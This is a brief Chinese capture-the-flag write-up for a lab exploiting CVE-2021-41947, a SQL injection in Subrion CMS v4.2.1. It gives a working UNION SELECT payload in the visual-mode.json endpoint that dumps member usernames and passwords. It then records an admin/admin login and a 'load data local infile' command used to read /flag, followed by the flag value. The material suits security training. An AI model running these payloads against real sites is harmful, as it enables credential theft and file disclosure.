春秋云镜 CVE-2021-41947 Subrion CMS v4.2.1 存在sql注入
靶标介绍
Subrion CMS v4.2.1 存在sql注入。
启动场景
漏洞利用
exp
http://localhost/panel/visual-mode.json?get=access&type=blocks' UNION ALL SELECT username, password FROM sbr421_members -- -&object=landing_what_is_this&page=index
admin/admin 登录后台
http://eci-2zeeqgumki5vc43zsipj.cloudeci1.ichunqiu.com/panel/visual-mode.json?get=access&type=blocks%27%20UNION%20ALL%20SELECT%20username,%20password%20FROM%20sbr415_members%20–%20-&object=landing_what_is_this&page=index
进入管理仪表盘http://eci-2zeeqgumki5vc43zsipj.cloudeci1.ichunqiu.com/panel/database/
CREATE TABLE xxx(data TEXT);
load data local infile ‘/flag’ into table xxx;
select * from xxx;
得到flag
flag{9ff99874-e577-4746-a77b-1b3020a20242}